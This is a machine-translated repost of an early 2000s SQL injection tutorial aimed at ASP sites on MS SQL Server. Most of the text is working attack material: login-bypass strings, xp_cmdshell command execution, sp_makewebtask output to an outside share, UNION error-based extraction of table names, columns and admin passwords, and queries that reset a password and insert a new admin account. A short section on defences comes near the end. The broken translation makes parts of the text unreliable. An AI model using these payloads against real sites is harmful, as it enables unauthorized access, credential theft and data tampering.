2. Tech
  3. SQL INJECTION skills drill

SQL INJECTION skills drill

xiaoxiao2021-03-06  64

Original: SK@scan-associates.net

Source: http://www.securiteam.com/

Translator: Demonalex

Translator Email: Demonalex_at_dark2s.org

On http://demonalex.cn.st / http://www.cnwill.com

Summary: The following is to help those who want to master this vulnerability and want to know how to protect people from this vulnerability to understand the vulnerability of the vulnerability.

Details:

1.0 Introduction When a machine only opens 80 ports (hereby providing HTTP services), you may not give you a lot of valuable information (vulnerability information), if this machine If the administrator is playing Patch for his server, we have to attack the head of the attack to the web service. SQL Injection Attack is one of the web attack type. This attack has no special requirements, and only the other party provides normal HTTP services, and does not need to pay attention to whether the administrator is "Patch Mad". Such attacks are mainly for some kind of web handler such as ASP, JSP, PHP, CGI, etc.).

This article is not to introduce any new "玩", and SQL injection attack has been widely circulated. The reason why I am writing this article is because I want to record some of my experiences from my recent experiment, I hope to give readers some references. You can also find more people written by others in "9.0 I can get more related information?" The column of SQL injection techniques.

1.1 What is SQL injection? This attack is to put SQL's query / behavior commands into a legitimate HTTP submission request via 'embedd' to achieve an attacker's intention. Many dynamic web pages now get some parameters from the request from the web, and then dynamically constitute SQL requests to the database. For example, when a user needs to log in (user authentication) on the web page (user authentication), the dynamic web page will send the username and password submitted to the SQL inquiry request to the database to confirm the user. Submitted authentication information is valid. At the perspective of SQL injection attacks, we can achieve the purpose of attacking the attack by modifying the username and / or password value when sending SQL requests.

1.2sql injection requires what (tools, etc.)? One (some) web browser.

2.0 What information is what you need to find? First you need to find a page that allows submission of data, such as: Landing page, search page, feedback page, and more. Sometimes, some HTML pages will pass the required parameters to other ASP pages via the post command. So, sometimes you don't see the relevant parameters in the URL path. Despite this, you can still distinguish whether there is parameter pass by viewing the "form" tab in the source code of HTML, the relevant code is as follows:

Each parameter transmission between and can be utilized (using SQL injection in the case of attack).

2.1 What should you do when you can't find a page with an input behavior? You can find some pages of related ASP, JSP, CGI, or PHP. Try to find some special URLs with certain parameters, such as http: //duck/index.asp? Id = 10

3.0 How should you test these defects? First join some special character tags, enter as: hi 'or 1 = 1 - Find some login page, enter the password input, or in the URL: - login: hi' or 1 = 1- - Pass: hi 'or 1 = 1 --- http: //duck/index.asp? Id = hi' or 1 = 1 - If you want to perform such tests with 'hidden', you can HTML pages download from the website to the local hard drive, modify the value of its hidden part, such as If you are lucky, it is estimated that you can now do not need your account and password and' successful landing '.

3.1 Why is it using 'OR 1 = 1 -? Let's take a look at the importance of using 'OR 1 = 1 in another example. Nominal login mode, using such a login method may get some special information that cannot be obtained in the normal landing. In proportion to the ASP page obtained in a link: http://duck/index.asp? Category = Food In this URL, 'category' is a variable name, and 'food' is a value given to the variable . To do this (link success), this ASP must contain the following related code (below is also the code we wrote in this experiment): v_cat = request ("category" sqlstr = "SELECT * from product where pcategory = ' "& v_cat &" "SET RS = conn.execute (SQLSTR) As we see, the variable value will pre-processed and assigned to 'v_cat', that is, the SQL statement will become: SELECT * FROM Product WHERE PCATEGORY = 'FOOD' This request will return the result obtained after the WHERE condition, which is 'FOOD' in this example. Now I want to change the URL to this way: http://duck/index.asp? Category = food 'or 1 = 1 - Now our variable v_cat value is equivalent to "Food' or 1 = 1 - "Now, if we want to resize the SQL request, the SQL request will be: select * from product where pcategory = 'food' or 1 = 1 - 'Now this request will be from the Product table Each message is selected and does not pay attention to whether Pcategory is equal to 'FOOD'. As for the two '-' (dash) at the end, it is used to tell 'MS SQL Server ignore the last' (single number). Sometimes you can use the '#' (Well number) instead of '-' (double broken number) here. Anyway, if the other party is not a SQL server (here is MS SQL Server), or you can't use a simple way to ignore the last single quotes, you can try: 'or' a '=' A. The entire SQL request will change to: select * from product where pcategory = 'food' or 'a' = 'a' it will return the same result. According to the actual situation, the SQL injection request is the possibility of multiple dynamic changes: 'OR 1 = 1-- "OR 1 = 1 - OR 1 = 1--' or 'a' = 'a" OR " a "=" a ') or (' a '=' a

4.0 How do I join an instant execution command in the SQL injection request? Servers that can perform SQL injection are usually some machines that are negligible to systematically configure check. At this point we can try to execute requests with SQL commands. The default MS SQL server is running under the System administrator, which is equivalent to the execution and access of the system administrator. We can use MS SQL Server extension storage procedures (such as master..xp_cmdshell et al.) To perform some of the commands of the remote system: '; exec master..xp_cmdshell' ping 10.10.1.2 '- If you fail, you can try it "( Double quotation marks) instead '(single quotes). The second colon in the above example represents the end of the SQL request (also on behalf of it, it is tightly followed by a new SQL command). To verify that the ping command is successful, You can listen to the ICMP request package on 10.10.1.2, and confirm that it comes from that SQL server: #tcpdump ICMP If you can't get PING request from that SQL server, and request in SQL request If you get an error message in the return value, it is possible because the administrator of the SQL server limits the web user access to these storage procedures. 5.0 How can I get the relevant return information of the SQL request I sent? We can use the sp_makewebtask process process Related requests to write URL: '; exec master..sp_makewewebtask "//10.10.1.3/share/output.html", "select * from information_schema.tables", but prerequisites are the folder "Share" attribute of the target host must Set to "Everyone".

6.0 How can I get some important data from the ODBC error message returned from the database? We can force MS SQL Server from returning information (such as table names, column names, etc.) from the returned information. For example, there is such a URL: http://duck/index.asp? Id = 10 In the above URL we can try to use the UNION clause to add other request strings after the integer '10', such as: http : //duck/index.asp? id = 10 Union Select Top 1 Table_name from information_schema.tables - The system table in the previous example Information_schema.tables includes all tables in this server. As for the table_name area, the name of each table is included. We have to choose this because we know that it must exist. In other words, our SQL inquiry request is: SELECT TOP 1 TABLE_NAME FROMATION_SCHEMA.TABLES - The server will return the first table name of the database after receiving the request data. When we use the UNION clause to add the request string to an integer 10, MS SQL Server will try to convert the string as an integer value. Since we can't turn string (nvarchar) to an integer type (int), the system generates an error. The server displays the following error message: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value 'table1' to a column of data type int./index .asp, Line 5 is very good, this error message tells us all related information that appears (including the table name we want to know). In this example, we know that the first table name is "table1". To get the next table name, we can send such a request: http://duck/index.asp? Id = 10 Union Select top 1 Table_name from information_schema.tables where table_name not in ('table1') - We also You can find the relevant special words via Like: http://duck/index.asp? Id = 10 Union Select Top 1 Table_name from information_schema.tables where table_name Like '% 25Login% 25' - Output: Microsoft Ole DB Provider For ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The nvarchar value 'admin_login' to a column of data type int./index.asp, line 5

6.1 How to find out the column name in the table? We can use another more important table information_schema.columns to list all list names: http://duck/index.asp? Id = 10 Union Select Top 1 Column_name from information_schema.columns where table_name = 'admin_login '- appears as output: Microsoft OLE DB Provider for ODBC Drivers error' 80040e07 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value' login_id 'to a column of data type int./index .asp, Line 5 has now got the name of the first column, we can also get the next column name: http://duck/index.asp? id = 10 Union Select Top 1 Column_name from information_schema .COLUMNS WHERE TABLE_NAME = 'admin_login' WHERE COLUMN_NAME NOT IN ( 'login_id') - output obtained: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the NVARCHAR VALUE 'login_name' to a column of data type int./index.asp, Line 5 If we continue to repeat this, we will get the remaining column names, such as "Password", "Details". When we use the following request (except the column name other than 'Login_ID', 'login_name', 'Password'): http://duck/index.asp? Id = 10 Union Select Top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'admin_login' WHERE COLUMN_NAME NOT IN ( 'login_id', 'login_name', 'password', details') - outputs obtained: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [ Microsoft] [ODBC SQL Server Driver] [SQL Server] Order by Items Must Appear in The SELECT LIST IF The Statement Contains a Union Operator./index.asp, Line 5

6.2 How do I find the data we need? Now we need to identify some more important tables and columns, we can use the same trick to ask the database to get relevant information. Let us ask the first username of the "admin_login" table: http://duck/index.asp? Id = 10 Union Select top 1 login_name from admin_login - Output: Microsoft Ole DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The Nvarchar Value 'Neo' to a Column of Data Type Int./index.asp, Line 5 Knowing an administrator account is "NEO ". Finally, what is the password of this administrator account: http://duck/index.asp? Id = 10 Union Select Top 1 password from admin_login where login_name = 'neo' - Output: Microsoft Ole DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE 'M4TRIX' TO A Column of Data Type Int./index.asp, Line 5 Now we can use "NEO" with His password ("m4trix") is logged in the system.

6.3 How to get a digital string value? A limitations of expression herein. To convert numbers (numbers between 0-9) to normal text data, we will not be able to get the error prompt information we need. For example, we now try to get the password "Trinity", and the password it corresponds to "31173": http://duck/index.asp? Id = 10 Union Select Top 1 Password from admin_login where login_name = 'TRINITY' - so that we probably only get the error prompts such as "Page Not Found". The main problem in this is that the password "31173" will be converted to a value after the collection is collected (using the UNION clause) in an integer (which is 10). In this case, this Union word call is the 'legal', the SQL server will not return any ODBC error messages, so we can't get these digital data. To solve this problem, we can add some alphabets to these data strings to determine that the conversion process is wrong. Let's try the following requests instead of the original request: http://duck/index.asp? Id = 10 Union Select Top 1 Convert (int, password% 2b '% 20 morpheus') from admin_login where login_name = 'Trinity' - Here we only joined a ( ) plus sign and other characters we want to join (' ' or equal to 0x2b in ASCII). We joined a (% 20) space and Morpheus into the actual password data. In this case, even if we get the number string '31173', it will also become '31173 Morpheus'. After executing the CONVERT () function, the system will try to convert the '31173 Morpheus' to an integer type, the SQL server will return such an ODBC error message: Microsoft Ole DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server driver] [SQL Server] Syntax Error Converting The Nvarchar Value '31173 Morpheus' to a Column of Data Type Int./index.asp, Line 5 Now you can know 'trinity' password is '31173'.

7.0 How do I update / insert data in the database? When successfully collected all the columns in the table, we can update the original data or INSERT (joined) data in the table. Hit a bit, we want to modify the password "neo" password: http://duck/index.asp? Id = 10; Update 'admin_login' set 'password' = 'newpas5' where login_name = 'neo' - join one New record: http://duck/index.asp? Id = 10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'Details') Values ​​(666,' NEO2 ',' NewPas5 ',' Na ') - Now we can use the account "neo2", password "newPas5" login system. 8.0 How to avoid being injected by SQL? Filter some characteristics of special image single quotes, double quotes, slashes, backslash, colon, empty characters, etc., filtering objects include:-user input - parameter parts in the submitted URL request - data obtained from cookies As for the numeric value, there must be a SQL statement declaration before converting it into an integer type, or determine it as an integer number with isNuMeric. Modify the user run level of "Startup and Run SQL Server" low level. Delete a range of stored procedures you don't need, such as: master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

9.0 Where can I get more related information? We initially come into contact with the SQL injection attacks in the articles of the Rain Forest Puppy about him invading PacketStorm. Http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6 A good article collected by ODBC error message: http://www.blackhat.com/presentation/win- .. .1LITCHFIELD.DOC For SQL injection in SQL Server: http://www.owasp.org/asac/input_validation/sql.Shtmlsense article About SQL injection article: http://www.sensepost .com / misc / sqlinsertion.htm Other related documents: http://www.digitaloffense.Net/wargames01/iowargames.ppthttp://www.wiretrip.net/rfp/p/doc.asp? id = 7 & iFace = 6HTTP: //www.wiretrip.Net/rfp/p/doc.asp?id=60&iface=6http://www.spidynamics.com/whitepapers/whi...qlinjection.pdf

--------------------

I would rather Taiwan don't grow grass, and there is also a Taiwanese Island!

Our Target: 1. Work hard to increase owned. 2. Announce Our Article (THEORIES, PRACTICE, DISCOVERS, STUDY SUMMARY)

转载请注明原文地址:https://www.9cbs.com/read-86031.html

9cbs

New Post(0)